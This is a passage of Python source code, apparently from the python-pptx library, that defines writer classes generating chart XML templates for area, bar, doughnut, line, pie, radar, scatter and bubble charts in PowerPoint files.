' <a:bodyPr/>\n'
' <a:lstStyle/>\n'
' <a:p>\n'
' <a:pPr>\n'
' <a:defRPr sz="1800"/>\n'
' </a:pPr>\n'
' <a:endParaRPr/>\n'
' </a:p>\n'
' </c:txPr>\n'
'</c:chartSpace>\n'
).format(**{
'grouping_xml': self._grouping_xml,
'ser_xml': self._ser_xml,
'cat_ax_xml': self._cat_ax_xml,
})
@property
def _cat_ax_xml(self):
categories = self._chart_data.categories
if categories.are_dates:
return (
' <c:dateAx>\n'
' <c:axId val="-2101159928"/>\n'
' <c:scaling>\n'
' <c:orientation val="minMax"/>\n'
' </c:scaling>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="b"/>\n'
' <c:numFmt formatCode="{nf}" sourceLinked="1"/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="-2100718248"/>\n'
' <c:crosses val="autoZero"/>\n'
' <c:auto val="1"/>\n'
' <c:lblOffset val="100"/>\n'
' <c:baseTimeUnit val="days"/>\n'
' </c:dateAx>\n'
).format(**{
'nf': categories.number_format,
})
return (
' <c:catAx>\n'
' <c:axId val="-2101159928"/>\n'
' <c:scaling>\n'
' <c:orientation val="minMax"/>\n'
' </c:scaling>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="b"/>\n'
' <c:numFmt formatCode="General" sourceLinked="1"/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="-2100718248"/>\n'
' <c:crosses val="autoZero"/>\n'
' <c:auto val="1"/>\n'
' <c:lblAlgn val="ctr"/>\n'
' <c:lblOffset val="100"/>\n'
' <c:noMultiLvlLbl val="0"/>\n'
' </c:catAx>\n'
)
@property
def _grouping_xml(self):
val = {
XL_CHART_TYPE.AREA: 'standard',
XL_CHART_TYPE.AREA_STACKED: 'stacked',
XL_CHART_TYPE.AREA_STACKED_100: 'percentStacked',
}[self._chart_type]
return ' <c:grouping val="%s"/>\n' % val
@property
def _ser_xml(self):
xml = ''
for series in self._chart_data:
xml_writer = _CategorySeriesXmlWriter(series)
xml += (
' <c:ser>\n'
' <c:idx val="{ser_idx}"/>\n'
' <c:order val="{ser_order}"/>\n'
'{tx_xml}'
'{cat_xml}'
'{val_xml}'
' </c:ser>\n'
).format(**{
'ser_idx': series.index,
'ser_order': series.index,
'tx_xml': xml_writer.tx_xml,
'cat_xml': xml_writer.cat_xml,
'val_xml': xml_writer.val_xml,
})
return xml
class _BarChartXmlWriter(_BaseChartXmlWriter):
"""
Provides specialized methods particular to the ``<c:barChart>`` element.
"""
@property
def xml(self):
return (
'<?xml version=\'1.0\' encoding=\'UTF-8\' standalone=\'yes\'?>\n'
'<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawin'
'gml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/draw'
'ingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/off'
'iceDocument/2006/relationships">\n'
' <c:date1904 val="0"/>\n'
' <c:chart>\n'
' <c:plotArea>\n'
' <c:barChart>\n'
'{barDir_xml}'
'{grouping_xml}'
'{ser_xml}'
'{overlap_xml}'
' <c:axId val="-2068027336"/>\n'
' <c:axId val="-2113994440"/>\n'
' </c:barChart>\n'
'{cat_ax_xml}'
' <c:valAx>\n'
' <c:axId val="-2113994440"/>\n'
' <c:scaling/>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="{val_ax_pos}"/>\n'
' <c:majorGridlines/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="-2068027336"/>\n'
' <c:crosses val="autoZero"/>\n'
' </c:valAx>\n'
' </c:plotArea>\n'
' <c:dispBlanksAs val="gap"/>\n'
' </c:chart>\n'
' <c:txPr>\n'
' <a:bodyPr/>\n'
' <a:lstStyle/>\n'
' <a:p>\n'
' <a:pPr>\n'
' <a:defRPr sz="1800"/>\n'
' </a:pPr>\n'
' <a:endParaRPr lang="en-US"/>\n'
' </a:p>\n'
' </c:txPr>\n'
'</c:chartSpace>\n'
).format(**{
'barDir_xml': self._barDir_xml,
'grouping_xml': self._grouping_xml,
'ser_xml': self._ser_xml,
'overlap_xml': self._overlap_xml,
'cat_ax_xml': self._cat_ax_xml,
'val_ax_pos': self._val_ax_pos,
})
@property
def _barDir_xml(self):
XL = XL_CHART_TYPE
bar_types = (
XL.BAR_CLUSTERED, XL.BAR_STACKED, XL.BAR_STACKED_100
)
col_types = (
XL.COLUMN_CLUSTERED, XL.COLUMN_STACKED, XL.COLUMN_STACKED_100
)
if self._chart_type in bar_types:
return ' <c:barDir val="bar"/>\n'
elif self._chart_type in col_types:
return ' <c:barDir val="col"/>\n'
raise NotImplementedError(
'no _barDir_xml() for chart type %s' % self._chart_type
)
@property
def _cat_ax_pos(self):
return {
XL_CHART_TYPE.BAR_CLUSTERED: 'l',
XL_CHART_TYPE.BAR_STACKED: 'l',
XL_CHART_TYPE.BAR_STACKED_100: 'l',
XL_CHART_TYPE.COLUMN_CLUSTERED: 'b',
XL_CHART_TYPE.COLUMN_STACKED: 'b',
XL_CHART_TYPE.COLUMN_STACKED_100: 'b',
}[self._chart_type]
@property
def _cat_ax_xml(self):
categories = self._chart_data.categories
if categories.are_dates:
return (
' <c:dateAx>\n'
' <c:axId val="-2068027336"/>\n'
' <c:scaling>\n'
' <c:orientation val="minMax"/>\n'
' </c:scaling>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="{cat_ax_pos}"/>\n'
' <c:numFmt formatCode="{nf}" sourceLinked="1"/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="-2113994440"/>\n'
' <c:crosses val="autoZero"/>\n'
' <c:auto val="1"/>\n'
' <c:lblOffset val="100"/>\n'
' <c:baseTimeUnit val="days"/>\n'
' </c:dateAx>\n'
).format(**{
'cat_ax_pos': self._cat_ax_pos,
'nf': categories.number_format,
})
return (
' <c:catAx>\n'
' <c:axId val="-2068027336"/>\n'
' <c:scaling>\n'
' <c:orientation val="minMax"/>\n'
' </c:scaling>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="{cat_ax_pos}"/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="-2113994440"/>\n'
' <c:crosses val="autoZero"/>\n'
' <c:auto val="1"/>\n'
' <c:lblAlgn val="ctr"/>\n'
' <c:lblOffset val="100"/>\n'
' <c:noMultiLvlLbl val="0"/>\n'
' </c:catAx>\n'
).format(**{
'cat_ax_pos': self._cat_ax_pos,
})
@property
def _grouping_xml(self):
XL = XL_CHART_TYPE
clustered_types = (XL.BAR_CLUSTERED, XL.COLUMN_CLUSTERED)
stacked_types = (XL.BAR_STACKED, XL.COLUMN_STACKED)
percentStacked_types = (XL.BAR_STACKED_100, XL.COLUMN_STACKED_100)
if self._chart_type in clustered_types:
return ' <c:grouping val="clustered"/>\n'
elif self._chart_type in stacked_types:
return ' <c:grouping val="stacked"/>\n'
elif self._chart_type in percentStacked_types:
return ' <c:grouping val="percentStacked"/>\n'
raise NotImplementedError(
'no _grouping_xml() for chart type %s' % self._chart_type
)
@property
def _overlap_xml(self):
XL = XL_CHART_TYPE
percentStacked_types = (
XL.BAR_STACKED, XL.BAR_STACKED_100, XL.COLUMN_STACKED,
XL.COLUMN_STACKED_100,
)
if self._chart_type in percentStacked_types:
return ' <c:overlap val="100"/>\n'
return ''
@property
def _ser_xml(self):
xml = ''
for series in self._chart_data:
xml_writer = _CategorySeriesXmlWriter(series)
xml += (
' <c:ser>\n'
' <c:idx val="{ser_idx}"/>\n'
' <c:order val="{ser_order}"/>\n'
'{tx_xml}'
'{cat_xml}'
'{val_xml}'
' </c:ser>\n'
).format(**{
'ser_idx': series.index,
'ser_order': series.index,
'tx_xml': xml_writer.tx_xml,
'cat_xml': xml_writer.cat_xml,
'val_xml': xml_writer.val_xml,
})
return xml
@property
def _val_ax_pos(self):
return {
XL_CHART_TYPE.BAR_CLUSTERED: 'b',
XL_CHART_TYPE.BAR_STACKED: 'b',
XL_CHART_TYPE.BAR_STACKED_100: 'b',
XL_CHART_TYPE.COLUMN_CLUSTERED: 'l',
XL_CHART_TYPE.COLUMN_STACKED: 'l',
XL_CHART_TYPE.COLUMN_STACKED_100: 'l',
}[self._chart_type]
class _DoughnutChartXmlWriter(_BaseChartXmlWriter):
"""
Provides specialized methods particular to the ``<c:doughnutChart>``
element.
"""
@property
def xml(self):
return (
'<?xml version=\'1.0\' encoding=\'UTF-8\' standalone=\'yes\'?>\n'
'<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawin'
'gml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/draw'
'ingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/off'
'iceDocument/2006/relationships">\n'
' <c:date1904 val="0"/>\n'
' <c:roundedCorners val="0"/>\n'
' <c:chart>\n'
' <c:autoTitleDeleted val="0"/>\n'
' <c:plotArea>\n'
' <c:layout/>\n'
' <c:doughnutChart>\n'
' <c:varyColors val="1"/>\n'
'{ser_xml}'
' <c:dLbls>\n'
' <c:showLegendKey val="0"/>\n'
' <c:showVal val="0"/>\n'
' <c:showCatName val="0"/>\n'
' <c:showSerName val="0"/>\n'
' <c:showPercent val="0"/>\n'
' <c:showBubbleSize val="0"/>\n'
' <c:showLeaderLines val="1"/>\n'
' </c:dLbls>\n'
' <c:firstSliceAng val="0"/>\n'
' <c:holeSize val="50"/>\n'
' </c:doughnutChart>\n'
' </c:plotArea>\n'
' <c:legend>\n'
' <c:legendPos val="r"/>\n'
' <c:layout/>\n'
' <c:overlay val="0"/>\n'
' </c:legend>\n'
' <c:plotVisOnly val="1"/>\n'
' <c:dispBlanksAs val="gap"/>\n'
' <c:showDLblsOverMax val="0"/>\n'
' </c:chart>\n'
' <c:txPr>\n'
' <a:bodyPr/>\n'
' <a:lstStyle/>\n'
' <a:p>\n'
' <a:pPr>\n'
' <a:defRPr sz="1800"/>\n'
' </a:pPr>\n'
' <a:endParaRPr/>\n'
' </a:p>\n'
' </c:txPr>\n'
'</c:chartSpace>\n'
).format(**{
'ser_xml': self._ser_xml,
})
@property
def _explosion_xml(self):
if self._chart_type == XL_CHART_TYPE.DOUGHNUT_EXPLODED:
return ' <c:explosion val="25"/>\n'
return ''
@property
def _ser_xml(self):
xml = ''
for series in self._chart_data:
xml_writer = _CategorySeriesXmlWriter(series)
xml += (
' <c:ser>\n'
' <c:idx val="{ser_idx}"/>\n'
' <c:order val="{ser_order}"/>\n'
'{tx_xml}'
'{explosion_xml}'
'{cat_xml}'
'{val_xml}'
' </c:ser>\n'
).format(**{
'ser_idx': series.index,
'ser_order': series.index,
'tx_xml': xml_writer.tx_xml,
'explosion_xml': self._explosion_xml,
'cat_xml': xml_writer.cat_xml,
'val_xml': xml_writer.val_xml,
})
return xml
class _LineChartXmlWriter(_BaseChartXmlWriter):
"""
Provides specialized methods particular to the ``<c:lineChart>`` element.
"""
@property
def xml(self):
return (
'<?xml version=\'1.0\' encoding=\'UTF-8\' standalone=\'yes\'?>\n'
'<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawin'
'gml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/draw'
'ingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/off'
'iceDocument/2006/relationships">\n'
' <c:date1904 val="0"/>\n'
' <c:chart>\n'
' <c:autoTitleDeleted val="0"/>\n'
' <c:plotArea>\n'
' <c:lineChart>\n'
'{grouping_xml}'
' <c:varyColors val="0"/>\n'
'{ser_xml}'
' <c:marker val="1"/>\n'
' <c:smooth val="0"/>\n'
' <c:axId val="2118791784"/>\n'
' <c:axId val="2140495176"/>\n'
' </c:lineChart>\n'
'{cat_ax_xml}'
' <c:valAx>\n'
' <c:axId val="2140495176"/>\n'
' <c:scaling/>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="l"/>\n'
' <c:majorGridlines/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="2118791784"/>\n'
' <c:crosses val="autoZero"/>\n'
' </c:valAx>\n'
' </c:plotArea>\n'
' <c:legend>\n'
' <c:legendPos val="r"/>\n'
' <c:layout/>\n'
' <c:overlay val="0"/>\n'
' </c:legend>\n'
' <c:plotVisOnly val="1"/>\n'
' <c:dispBlanksAs val="gap"/>\n'
' <c:showDLblsOverMax val="0"/>\n'
' </c:chart>\n'
' <c:txPr>\n'
' <a:bodyPr/>\n'
' <a:lstStyle/>\n'
' <a:p>\n'
' <a:pPr>\n'
' <a:defRPr sz="1800"/>\n'
' </a:pPr>\n'
' <a:endParaRPr lang="en-US"/>\n'
' </a:p>\n'
' </c:txPr>\n'
'</c:chartSpace>\n'
).format(**{
'grouping_xml': self._grouping_xml,
'ser_xml': self._ser_xml,
'cat_ax_xml': self._cat_ax_xml,
})
@property
def _cat_ax_xml(self):
categories = self._chart_data.categories
if categories.are_dates:
return (
' <c:dateAx>\n'
' <c:axId val="2118791784"/>\n'
' <c:scaling>\n'
' <c:orientation val="minMax"/>\n'
' </c:scaling>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="b"/>\n'
' <c:numFmt formatCode="{nf}" sourceLinked="1"/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="2140495176"/>\n'
' <c:crosses val="autoZero"/>\n'
' <c:auto val="1"/>\n'
' <c:lblOffset val="100"/>\n'
' <c:baseTimeUnit val="days"/>\n'
' </c:dateAx>\n'
).format(**{
'nf': categories.number_format,
})
return (
' <c:catAx>\n'
' <c:axId val="2118791784"/>\n'
' <c:scaling>\n'
' <c:orientation val="minMax"/>\n'
' </c:scaling>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="b"/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="2140495176"/>\n'
' <c:crosses val="autoZero"/>\n'
' <c:auto val="1"/>\n'
' <c:lblAlgn val="ctr"/>\n'
' <c:lblOffset val="100"/>\n'
' <c:noMultiLvlLbl val="0"/>\n'
' </c:catAx>\n'
)
@property
def _grouping_xml(self):
XL = XL_CHART_TYPE
standard_types = (XL.LINE, XL.LINE_MARKERS)
stacked_types = (XL.LINE_STACKED, XL.LINE_MARKERS_STACKED)
percentStacked_types = (
XL.LINE_STACKED_100, XL.LINE_MARKERS_STACKED_100
)
if self._chart_type in standard_types:
return ' <c:grouping val="standard"/>\n'
elif self._chart_type in stacked_types:
return ' <c:grouping val="stacked"/>\n'
elif self._chart_type in percentStacked_types:
return ' <c:grouping val="percentStacked"/>\n'
raise NotImplementedError(
'no _grouping_xml() for chart type %s' % self._chart_type
)
@property
def _marker_xml(self):
XL = XL_CHART_TYPE
no_marker_types = (XL.LINE, XL.LINE_STACKED, XL.LINE_STACKED_100)
if self._chart_type in no_marker_types:
return (
' <c:marker>\n'
' <c:symbol val="none"/>\n'
' </c:marker>\n'
)
return ''
@property
def _ser_xml(self):
xml = ''
for series in self._chart_data:
xml_writer = _CategorySeriesXmlWriter(series)
xml += (
' <c:ser>\n'
' <c:idx val="{ser_idx}"/>\n'
' <c:order val="{ser_order}"/>\n'
'{tx_xml}'
'{marker_xml}'
'{cat_xml}'
'{val_xml}'
' <c:smooth val="0"/>\n'
' </c:ser>\n'
).format(**{
'ser_idx': series.index,
'ser_order': series.index,
'tx_xml': xml_writer.tx_xml,
'marker_xml': self._marker_xml,
'cat_xml': xml_writer.cat_xml,
'val_xml': xml_writer.val_xml,
})
return xml
class _PieChartXmlWriter(_BaseChartXmlWriter):
"""
Provides specialized methods particular to the ``<c:pieChart>`` element.
"""
@property
def xml(self):
return (
'<?xml version=\'1.0\' encoding=\'UTF-8\' standalone=\'yes\'?>\n'
'<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawin'
'gml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/draw'
'ingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/off'
'iceDocument/2006/relationships">\n'
' <c:chart>\n'
' <c:plotArea>\n'
' <c:pieChart>\n'
' <c:varyColors val="1"/>\n'
'{ser_xml}'
' </c:pieChart>\n'
' </c:plotArea>\n'
' <c:dispBlanksAs val="gap"/>\n'
' </c:chart>\n'
' <c:txPr>\n'
' <a:bodyPr/>\n'
' <a:lstStyle/>\n'
' <a:p>\n'
' <a:pPr>\n'
' <a:defRPr sz="1800"/>\n'
' </a:pPr>\n'
' <a:endParaRPr lang="en-US"/>\n'
' </a:p>\n'
' </c:txPr>\n'
'</c:chartSpace>\n'
).format(**{
'ser_xml': self._ser_xml,
})
@property
def _explosion_xml(self):
if self._chart_type == XL_CHART_TYPE.PIE_EXPLODED:
return ' <c:explosion val="25"/>\n'
return ''
@property
def _ser_xml(self):
xml_writer = _CategorySeriesXmlWriter(self._chart_data[0])
xml = (
' <c:ser>\n'
' <c:idx val="0"/>\n'
' <c:order val="0"/>\n'
'{tx_xml}'
'{explosion_xml}'
'{cat_xml}'
'{val_xml}'
' </c:ser>\n'
).format(**{
'tx_xml': xml_writer.tx_xml,
'explosion_xml': self._explosion_xml,
'cat_xml': xml_writer.cat_xml,
'val_xml': xml_writer.val_xml,
})
return xml
class _RadarChartXmlWriter(_BaseChartXmlWriter):
"""
Generates XML for the ``<c:radarChart>`` element.
"""
@property
def xml(self):
return (
'<?xml version=\'1.0\' encoding=\'UTF-8\' standalone=\'yes\'?>\n'
'<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawin'
'gml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/draw'
'ingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/off'
'iceDocument/2006/relationships">\n'
' <c:date1904 val="0"/>\n'
' <c:roundedCorners val="0"/>\n'
' <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.'
'org/markup-compatibility/2006">\n'
' <mc:Choice xmlns:c14="http://schemas.microsoft.com/office/d'
'rawing/2007/8/2/chart" Requires="c14">\n'
' <c14:style val="118"/>\n'
' </mc:Choice>\n'
' <mc:Fallback>\n'
' <c:style val="18"/>\n'
' </mc:Fallback>\n'
' </mc:AlternateContent>\n'
' <c:chart>\n'
' <c:plotArea>\n'
' <c:layout/>\n'
' <c:radarChart>\n'
' <c:radarStyle val="{radar_style}"/>\n'
' <c:varyColors val="0"/>\n'
'{ser_xml}'
' <c:axId val="2073612648"/>\n'
' <c:axId val="-2112772216"/>\n'
' </c:radarChart>\n'
' <c:catAx>\n'
' <c:axId val="2073612648"/>\n'
' <c:scaling>\n'
' <c:orientation val="minMax"/>\n'
' </c:scaling>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="b"/>\n'
' <c:majorGridlines/>\n'
' <c:numFmt formatCode="m/d/yy" sourceLinked="1"/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="-2112772216"/>\n'
' <c:crosses val="autoZero"/>\n'
' <c:auto val="1"/>\n'
' <c:lblAlgn val="ctr"/>\n'
' <c:lblOffset val="100"/>\n'
' <c:noMultiLvlLbl val="0"/>\n'
' </c:catAx>\n'
' <c:valAx>\n'
' <c:axId val="-2112772216"/>\n'
' <c:scaling>\n'
' <c:orientation val="minMax"/>\n'
' </c:scaling>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="l"/>\n'
' <c:majorGridlines/>\n'
' <c:numFmt formatCode="General" sourceLinked="1"/>\n'
' <c:majorTickMark val="cross"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="2073612648"/>\n'
' <c:crosses val="autoZero"/>\n'
' <c:crossBetween val="between"/>\n'
' </c:valAx>\n'
' </c:plotArea>\n'
' <c:plotVisOnly val="1"/>\n'
' <c:dispBlanksAs val="gap"/>\n'
' <c:showDLblsOverMax val="0"/>\n'
' </c:chart>\n'
' <c:txPr>\n'
' <a:bodyPr/>\n'
' <a:lstStyle/>\n'
' <a:p>\n'
' <a:pPr>\n'
' <a:defRPr sz="1800"/>\n'
' </a:pPr>\n'
' <a:endParaRPr lang="en-US"/>\n'
' </a:p>\n'
' </c:txPr>\n'
'</c:chartSpace>\n'
).format(**{
'radar_style': self._radar_style,
'ser_xml': self._ser_xml,
})
@property
def _marker_xml(self):
if self._chart_type == XL_CHART_TYPE.RADAR:
return (
' <c:marker>\n'
' <c:symbol val="none"/>\n'
' </c:marker>\n'
)
return ''
@property
def _radar_style(self):
if self._chart_type == XL_CHART_TYPE.RADAR_FILLED:
return 'filled'
return 'marker'
@property
def _ser_xml(self):
xml = ''
for series in self._chart_data:
xml_writer = _CategorySeriesXmlWriter(series)
xml += (
' <c:ser>\n'
' <c:idx val="{ser_idx}"/>\n'
' <c:order val="{ser_order}"/>\n'
'{tx_xml}'
'{marker_xml}'
'{cat_xml}'
'{val_xml}'
' <c:smooth val="0"/>\n'
' </c:ser>\n'
).format(**{
'ser_idx': series.index,
'ser_order': series.index,
'tx_xml': xml_writer.tx_xml,
'marker_xml': self._marker_xml,
'cat_xml': xml_writer.cat_xml,
'val_xml': xml_writer.val_xml,
})
return xml
class _XyChartXmlWriter(_BaseChartXmlWriter):
"""
Generates XML for the ``<c:scatterChart>`` element.
"""
@property
def xml(self):
xml = (
'<?xml version=\'1.0\' encoding=\'UTF-8\' standalone=\'yes\'?>\n'
'<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawin'
'gml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/draw'
'ingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/off'
'iceDocument/2006/relationships">\n'
' <c:chart>\n'
' <c:plotArea>\n'
' <c:scatterChart>\n'
' <c:scatterStyle val="%s"/>\n'
' <c:varyColors val="0"/>\n'
'%s'
' <c:axId val="-2128940872"/>\n'
' <c:axId val="-2129643912"/>\n'
' </c:scatterChart>\n'
' <c:valAx>\n'
' <c:axId val="-2128940872"/>\n'
' <c:scaling>\n'
' <c:orientation val="minMax"/>\n'
' </c:scaling>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="b"/>\n'
' <c:numFmt formatCode="General" sourceLinked="1"/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="-2129643912"/>\n'
' <c:crosses val="autoZero"/>\n'
' <c:crossBetween val="midCat"/>\n'
' </c:valAx>\n'
' <c:valAx>\n'
' <c:axId val="-2129643912"/>\n'
' <c:scaling>\n'
' <c:orientation val="minMax"/>\n'
' </c:scaling>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="l"/>\n'
' <c:majorGridlines/>\n'
' <c:numFmt formatCode="General" sourceLinked="1"/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="-2128940872"/>\n'
' <c:crosses val="autoZero"/>\n'
' <c:crossBetween val="midCat"/>\n'
' </c:valAx>\n'
' </c:plotArea>\n'
' <c:legend>\n'
' <c:legendPos val="r"/>\n'
' <c:layout/>\n'
' <c:overlay val="0"/>\n'
' </c:legend>\n'
' <c:plotVisOnly val="1"/>\n'
' <c:dispBlanksAs val="gap"/>\n'
' <c:showDLblsOverMax val="0"/>\n'
' </c:chart>\n'
' <c:txPr>\n'
' <a:bodyPr/>\n'
' <a:lstStyle/>\n'
' <a:p>\n'
' <a:pPr>\n'
' <a:defRPr sz="1800"/>\n'
' </a:pPr>\n'
' <a:endParaRPr lang="en-US"/>\n'
' </a:p>\n'
' </c:txPr>\n'
'</c:chartSpace>\n'
) % (self._scatterStyle_val, self._ser_xml)
return xml
@property
def _marker_xml(self):
no_marker_types = (
XL_CHART_TYPE.XY_SCATTER_LINES_NO_MARKERS,
XL_CHART_TYPE.XY_SCATTER_SMOOTH_NO_MARKERS,
)
if self._chart_type in no_marker_types:
return (
' <c:marker>\n'
' <c:symbol val="none"/>\n'
' </c:marker>\n'
)
return ''
@property
def _scatterStyle_val(self):
smooth_types = (
XL_CHART_TYPE.XY_SCATTER_SMOOTH,
XL_CHART_TYPE.XY_SCATTER_SMOOTH_NO_MARKERS,
)
if self._chart_type in smooth_types:
return 'smoothMarker'
return 'lineMarker'
@property
def _ser_xml(self):
xml = ''
for series in self._chart_data:
xml_writer = _XySeriesXmlWriter(series)
xml += (
' <c:ser>\n'
' <c:idx val="{ser_idx}"/>\n'
' <c:order val="{ser_order}"/>\n'
'{tx_xml}'
'{spPr_xml}'
'{marker_xml}'
'{xVal_xml}'
'{yVal_xml}'
' <c:smooth val="0"/>\n'
' </c:ser>\n'
).format(**{
'ser_idx': series.index,
'ser_order': series.index,
'tx_xml': xml_writer.tx_xml,
'spPr_xml': self._spPr_xml,
'marker_xml': self._marker_xml,
'xVal_xml': xml_writer.xVal_xml,
'yVal_xml': xml_writer.yVal_xml,
})
return xml
@property
def _spPr_xml(self):
if self._chart_type == XL_CHART_TYPE.XY_SCATTER:
return (
' <c:spPr>\n'
' <a:ln w="47625">\n'
' <a:noFill/>\n'
' </a:ln>\n'
' </c:spPr>\n'
)
return ''
class _BubbleChartXmlWriter(_XyChartXmlWriter):
"""
Provides specialized methods particular to the ``<c:bubbleChart>``
element.
"""
@property
def xml(self):
xml = (
'<?xml version=\'1.0\' encoding=\'UTF-8\' standalone=\'yes\'?>\n'
'<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawin'
'gml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/draw'
'ingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/off'
'iceDocument/2006/relationships">\n'
' <c:chart>\n'
' <c:autoTitleDeleted val="0"/>\n'
' <c:plotArea>\n'
' <c:layout/>\n'
' <c:bubbleChart>\n'
' <c:varyColors val="0"/>\n'
'%s'
' <c:dLbls>\n'
' <c:showLegendKey val="0"/>\n'
' <c:showVal val="0"/>\n'
' <c:showCatName val="0"/>\n'
' <c:showSerName val="0"/>\n'
' <c:showPercent val="0"/>\n'
' <c:showBubbleSize val="0"/>\n'
' </c:dLbls>\n'
' <c:bubbleScale val="100"/>\n'
' <c:showNegBubbles val="0"/>\n'
' <c:axId val="-2115720072"/>\n'
' <c:axId val="-2115723560"/>\n'
' </c:bubbleChart>\n'
' <c:valAx>\n'
' <c:axId val="-2115720072"/>\n'
' <c:scaling>\n'
' <c:orientation val="minMax"/>\n'
' </c:scaling>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="b"/>\n'
' <c:numFmt formatCode="General" sourceLinked="1"/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="-2115723560"/>\n'
' <c:crosses val="autoZero"/>\n'
' <c:crossBetween val="midCat"/>\n'
' </c:valAx>\n'
' <c:valAx>\n'
' <c:axId val="-2115723560"/>\n'
' <c:scaling>\n'
' <c:orientation val="minMax"/>\n'
' </c:scaling>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="l"/>\n'
' <c:majorGridlines/>\n'
' <c:numFmt formatCode="General" sourceLinked="1"/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="-2115720072"/>\n'
' <c:crosses val="autoZero"/>\n'
' <c:crossBetween val="midCat"/>\n'
' </c:valAx>\n'
' </c:plotArea>\n'
' <c:legend>\n'
' <c:legendPos val="r"/>\n'
' <c:layout/>\n'
' <c:overlay val="0"/>\n'
' </c:legend>\n'
' <c:plotVisOnly val="1"/>\n'
' <c:dispBlanksAs val="gap"/>\n'
' <c:showDLblsOverMax val="0"/>\n'
' </c:chart>\n'
' <c:txPr>\n'
' <a:bodyPr/>\n'
' <a:lstStyle/>\n'
' <a:p>\n'
' <a:pPr>\n'
' <a:defRPr sz="1800"/>\n'
' </a:pPr>\n'
' <a:endParaRPr lang="en-US"/>\n'
' </a:p>\n'
' </c:txPr>\n'
'</c:chartSpace>\n'
) % self._ser_xml
return xml
@property
def _bubble3D_val(self):
if self._chart_type == XL_CHART_TYPE.BUBBLE_THREE_D_EFFECT:
return '1'
return '0'
@property
def _ser_xml(self):
xml = ''
for series in self._chart_data:
xml_writer = _BubbleSeriesXmlWriter(series)
xml += (
' <c:ser>\n'
' <c:idx val="{ser_idx}"/>\n'
' <c:order val="{ser_order}"/>\n'
'{tx_xml}'
' <c:invertIfNegative val="0"/>\n'
'{xVal_xml}'
'{yVal_xml}'
'{bubbleSize_xml}'
' <c:bubble3D val="{bubble3D_val}"/>\n'
' </c:ser>\n'
).format(**{
'ser_idx': series.index,
'ser_order': series.index,
'tx_xml': xml_writer.tx_xml,
'xVal_xml': xml_writer.xVal_xml,
'yVal_xml': xml_writer.yVal_xml,
'bubbleSize_xml': xml_writer.bubbleSize_xml,
'bubble3D_val': self._bubble3D_val,
})
return xml
class _CategorySeriesXmlWriter(_BaseSeriesXmlWriter):
"""
Generates XML snippets particular to a category chart series.
"""
@property
def cat(self):
"""
Return the ``<c:cat>`` element XML for this series, as an oxml
element.
"""
categories = self._series.categories
if categories.are_numeric:
return parse_xml(
self._numRef_cat_tmpl.format(**{
'wksht_ref': self._series.categories_ref,
'number_format': categories.number_format,
